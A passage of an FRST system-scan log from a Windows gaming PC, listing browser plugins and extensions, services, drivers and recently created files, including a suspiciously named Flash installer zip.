FF Plugin: @java.com/DTPlugin,version=10.75.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2015-03-19] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.75.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2015-03-19] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_22_0_0_209.dll [2016-08-01] ()
FF Plugin-x32: @esn.me/esnsonar,version=0.70.4 -> C:\Program Files (x86)\Battlelog Web Plugins\Sonar\0.70.4\npesnsonar.dll [2011-11-03] (ESN Social Software AB)
FF Plugin-x32: @esn/esnlaunch,version=2.3.0 -> C:\Program Files (x86)\Battlelog Web Plugins\2.3.0\npesnlaunch.dll [2013-09-16] (ESN Social Software AB)
FF Plugin-x32: @esn/npbattlelog,version=2.6.2 -> C:\Program Files (x86)\Battlelog Web Plugins\2.6.2\npbattlelog.dll [2014-12-03] (EA Digital Illusions CE AB)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2015-05-21] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-07-11] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.65.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-07-11] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-09-12] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1771700083-1338792134-2885675772-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\King\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-05-08] (Unity Technologies ApS)
FF Plugin ProgramFiles/Appdata: C:\Users\King\AppData\Roaming\mozilla\plugins\npgoogletalk.dll [2013-09-20] (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\King\AppData\Roaming\mozilla\plugins\npgtpo3dautoplugin.dll [2013-09-20] ()
FF Plugin ProgramFiles/Appdata: C:\Users\King\AppData\Roaming\mozilla\plugins\npo1d.dll [2013-09-20] (Google)

Chrome: 
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\King\AppData\Local\Google\Chrome\User Data\Default [2016-10-19]
CHR Extension: (BetterTTV) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajopnjidmegmdimjlfnijceegpefgped [2016-10-10]
CHR Extension: (Google Docs) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-27]
CHR Extension: (Google Drive) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-22]
CHR Extension: (Session Manager) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\bbcnbpafconjjigibnhbfmmgdbbkcjfi [2016-04-29]
CHR Extension: (YouTube) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-29]
CHR Extension: (FrankerFaceZ) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\fadndhdgpmmaapbmfcknlfgcflmmmieb [2015-10-31]
CHR Extension: (Stylish) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjnbnpbmkenffdnngjfgmeleoegfcffe [2016-04-05]
CHR Extension: (Google Docs Offline) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
CHR Extension: (AdBlock) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-10-09]
CHR Extension: (BetterDiscord) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\ldbnkkfciifmjgnpfkobkmkhllmkghna [2016-01-02]
CHR Extension: (SmoothScroll) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\nbokbjkabcmbfdlbddjidfmibcpneigj [2016-10-19]
CHR Extension: (Chrome Web Store Payments) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Gmail) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-11]
CHR Extension: (Chrome Media Router) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-09-21]
CHR Extension: (RSS Feed Reader) - C:\Users\King\AppData\Local\Google\Chrome\User Data\Default\Extensions\pnjaodmkngahhkoihejjehlcdlnohgmp [2016-10-02]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [1392648 2016-07-12] ()
S3 celavimushost; R:\Program Files (x86)\CEVO\CSGO Client Beta\CelavimusClientHelper.exe [124120 2015-09-13] (altPUG LLC)
S3 Creative ALchemy AL6 Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\AL6Licensing.exe [79360 2014-05-09] (Creative Labs) [File not signed]
S3 Creative Audio Engine Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [79360 2016-04-09] (Creative Labs) [File not signed]
R2 CTAudSvcService; C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe [286720 2010-02-12] (Creative Technology Ltd) [File not signed]
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-04-07] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-04-07] (Dropbox, Inc.)
R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [38000 2016-10-10] (Dropbox, Inc.)
R2 DTSAudioService; C:\Program Files\Realtek\Audio\HDA\DTSAudioService64.exe [210024 2011-05-31] (DTS)
R2 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [192120 2015-09-19] (Logitech Inc.)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [120888 2016-08-30] (Microsoft Corporation)
R2 MSSQL$SQLEXPRESS; C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe [57617752 2009-03-30] (Microsoft Corporation)
R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-08-30] (Microsoft Corporation)
S4 nlsvc; C:\Program Files\Locktime Software\NetLimiter 4\NLSvc.exe [329344 2015-03-04] (Locktime Software)
S4 Origin Client Service; D:\Program Files (x86)\Origin\OriginClientService.exe [2104840 2016-03-03] (Electronic Arts)
R2 OVRService; C:\Program Files (x86)\Oculus\Service\OVRServiceLauncher.exe [231952 2014-12-03] () [File not signed]
R2 PnkBstrA; C:\Windows\system32\PnkBstrA.exe [76152 2015-12-10] ()
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2015-12-09] ()
S4 RemoteMouseService; C:\Program Files (x86)\Remote Mouse\RemoteMouseService.exe [18432 2016-05-17] () [File not signed]
R2 S3DSvc32; C:\Program Files (x86)\iZ3D Driver\Win32\S3DCService.exe [357888 2011-06-16] (iZ3D Inc.) [File not signed]
R2 S3DSvc64; C:\Program Files (x86)\iZ3D Driver\Win64\S3DCService.exe [477696 2011-06-16] (iZ3D Inc.) [File not signed]
S4 SBSDWSCService; D:\Program Files (x86)\Spybot - Search & Destroy\SDWinSec.exe [1153368 2009-01-26] (Safer Networking Ltd.)
S4 SQLAgent$SQLEXPRESS; C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [427880 2009-03-30] (Microsoft Corporation)
S3 VSStandardCollectorService140; C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [52968 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
S2 ZAPrivacyService; "C:\Program Files (x86)\CheckPoint\ZoneAlarm\ZAPrivacyService.exe" [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 COMMONFX.DLL; C:\Windows\System32\COMMONFX.DLL [157496 2007-03-05] (Creative Technology Ltd)
S3 CTAUDFX.DLL; C:\Windows\System32\CTAUDFX.DLL [700216 2007-03-05] (Creative Technology Ltd)
S3 CTEAPSFX.DLL; C:\Windows\System32\CTEAPSFX.DLL [219448 2007-03-05] (Creative Technology Ltd)
S3 CTEDSPFX.DLL; C:\Windows\System32\CTEDSPFX.DLL [321848 2007-03-05] (Creative Technology Ltd)
S3 CTEDSPIO.DLL; C:\Windows\System32\CTEDSPIO.DLL [190264 2007-03-05] (Creative Technology Ltd)
S3 CTEDSPSY.DLL; C:\Windows\System32\CTEDSPSY.DLL [363320 2007-03-05] (Creative Technology Ltd)
S3 CTERFXFX.DLL; C:\Windows\System32\CTERFXFX.DLL [142136 2007-03-05] (Creative Technology Ltd)
S3 CTSBLFX.DLL; C:\Windows\System32\CTSBLFX.DLL [681272 2007-03-05] (Creative Technology Ltd)
S3 danewFltr; C:\Windows\System32\drivers\danew.sys [12032 2010-03-23] (Razer (Asia-Pacific) Pte Ltd) [File not signed]
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283064 2014-05-18] (Disc Soft Ltd)
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R1 ESEADriver2; C:\Users\King\AppData\Local\Temp\ESEADriver2.sys [314720 2016-07-09] ()
S3 IOMap; C:\Windows\system32\drivers\IOMap64.sys [24824 2014-10-22] (ASUSTeK Computer Inc.)
R1 iZ3DInjectionDriver; C:\Program Files (x86)\iZ3D Driver\Win64\S3DInjectionDriver.sys [43704 2011-06-16] ()
R0 iZ3DShutterService; C:\Windows\System32\Drivers\iZ3DShutterService.sys [17464 2011-06-16] (iZ3D Inc.)
R0 KL1; C:\Windows\System32\DRIVERS\kl1.sys [458584 2012-11-15] (Kaspersky Lab ZAO)
U5 klflt; C:\Windows\System32\Drivers\klflt.sys [89944 2013-02-21] (Kaspersky Lab)
R1 KLIF; C:\Windows\System32\DRIVERS\klif.sys [613720 2013-02-21] (Kaspersky Lab)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech)
R3 LGJoyXlCore; C:\Windows\System32\drivers\LGJoyXlCore.sys [68384 2015-06-10] (Logitech Inc.)
S3 LGSHidFilt; C:\Windows\System32\DRIVERS\LGSHidFilt.Sys [64280 2013-05-30] (Logitech Inc.)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
R1 nbdrv; C:\Windows\System32\DRIVERS\nbdrv.sys [41392 2013-11-25] (SeriousBit)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
R2 nldrv; C:\Program Files\Locktime Software\NetLimiter 4\nldrv.sys [125360 2015-03-04] (Locktime Software)
R3 nvlddmkm; C:\Windows\System32\DRIVERS\nvlddmkm.sys [11127392 2012-06-26] (NVIDIA Corporation) [File not signed]
S3 OCUSBVID; C:\Windows\System32\DRIVERS\OCUSBVID.sys [47560 2014-12-03] (Oculus VR, LLC)
R3 Phosgene; C:\Windows\System32\DRIVERS\Phosgene.sys [33672 2015-09-02] (Adoriasoft LLC)
R0 pwdrvio; C:\Windows\System32\pwdrvio.sys [19152 2013-09-30] ()
S3 pwdspio; C:\Windows\system32\pwdspio.sys [12504 2013-09-30] ()
R1 RiftEnabler; C:\Windows\System32\DRIVERS\RiftEnabler.sys [53704 2014-12-03] (Oculus VR, LLC)
S3 rt61x64; C:\Windows\System32\DRIVERS\WMP54Gv41x64.sys [446304 2010-04-07] (Ralink Technology, Corp.)
S3 rzdaendpt; C:\Windows\System32\DRIVERS\rzdaendpt.sys [43720 2015-08-13] (Razer Inc)
S3 rzvkeyboard; C:\Windows\System32\DRIVERS\rzvkeyboard.sys [44232 2015-08-13] (Razer Inc)
S3 Spyder2; C:\Windows\System32\DRIVERS\Spyder2.sys [15360 2007-01-17] ()
S3 usbcamcl; C:\Windows\System32\DRIVERS\usbcamcl.sys [62184 2011-12-08] (usb camera)
S3 VMUVC; C:\Windows\System32\Drivers\VMUVC.sys [198784 2009-05-25] (Vimicro Corporation)
S3 vvftUVC; C:\Windows\System32\drivers\vvftUVC.sys [303616 2008-07-01] (Vimicro Corporation)
U5 VWiFiFlt; C:\Windows\System32\Drivers\VWiFiFlt.sys [59904 2009-07-13] (Microsoft Corporation)
S3 WinRing0_1_2_0; D:\Program Files (x86)\EVGA\PrecisionX 16\WinRing0\WinRing0x64.sys [14536 2015-10-20] (OpenLibSys.org)
S3 x323e501; C:\Windows\SysWOW64\drivers\x323e501.sys [44896 2014-06-12] (Your Corporation) [File not signed]
S3 x643e501; C:\Windows\System32\drivers\x643e501.sys [68832 2014-06-12] (Your Corporation) [File not signed]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 CT20XUT.DLL; system32\CT20XUT.DLL [X]
S3 CTEXFIFX.DLL; system32\CTEXFIFX.DLL [X]
S3 CTHWIUT.DLL; system32\CTHWIUT.DLL [X]
S3 dbx; system32\DRIVERS\dbx.sys [X]
S0 iaStor; system32\DRIVERS\iaStor.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-19 19:20 - 2016-10-19 19:20 - 00033540 _____ C:\Users\King\Desktop\FRST.txt
2016-10-19 19:19 - 2016-10-19 19:20 - 00000000 ____D C:\FRST
2016-10-19 19:19 - 2016-10-19 19:19 - 02407424 _____ (Farbar) C:\Users\King\Desktop\FRST64.exe
2016-10-19 16:52 - 2016-08-01 17:09 - 00452266 _____ C:\Windows\system32\Drivers\etc\hosts.20161019-165239.backup
2016-10-19 16:21 - 2016-10-19 16:21 - 00000000 ____D C:\Users\King\Desktop\install_flаsh_plаyer_for_windows_4_1_9_0172
2016-10-19 16:19 - 2016-10-19 16:19 - 00117955 _____ (Аdоbе) C:\Users\King\Desktop\install_flаsh_plаyer_for_windows_4_1_9_0172.zip
2016-10-14 20:24 - 2016-10-14 20:24 - 00000000 _____ C:\Windows\cd_127
2016-10-13 14:55 - 2016-10-13 14:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2016-10-11 23:30 - 2016-09-30 08:37 - 05548264 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-10-11 23:30 - 2016-09-30 08:20 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-10-11 23:30 - 2016-09-30 08:20 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-10-11 23:30 - 2016-09-15 08:30 - 00976896 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2016-10-11 23:30 - 2016-09-15 08:30 - 00084480 _____ (Microsoft Corporation) C:\Windows\system32\INETRES.dll
2016-10-11 23:30 - 2016-09-15 08:15 - 00741888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2016-10-11 23:30 - 2016-09-15 08:15 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\INETRES.dll
2016-10-11 23:30 - 2016-09-12 14:13 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-10-11 23:30 - 2016-09-12 14:13 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2016-10-11 23:30 - 2016-09-12 14:08 - 01465344 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00316416 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\adsmsext.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2016-10-11 23:30 - 2016-09-12 14:08 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00260608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adsmsext.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2016-10-11 23:30 - 2016-09-12 13:49 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2016-10-11 23:30 - 2016-09-12 13:39 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2016-10-11 23:30 - 2016-09-12 13:37 - 03218944 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-10-11 23:30 - 2016-09-12 13:32 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-10-11 23:30 - 2016-09-12 13:32 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-10-11 23:30 - 2016-09-12 13:32 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-10-11 23:30 - 2016-09-12 13:31 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2016-10-11 23:30 - 2016-09-12 13:29 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2016-10-11 23:30 - 2016-09-12 13:25 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2016-10-11 23:30 - 2016-09-12 12:08 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2016-10-11 23:30 - 2016-09-12 11:43 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2016-10-11 23:30 - 2016-09-12 11:43 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2016-10-11 23:30 - 2016-09-10 09:19 - 03649536 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll
2016-10-11 23:30 - 2016-09-10 08:53 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll
2016-10-11 23:30 - 2016-09-09 11:29 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-10-11 23:30 - 2016-09-09 11:26 - 00706280 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-10-11 23:30 - 2016-09-09 11:23 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2016-10-11 23:30 - 2016-09-09 11:20 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
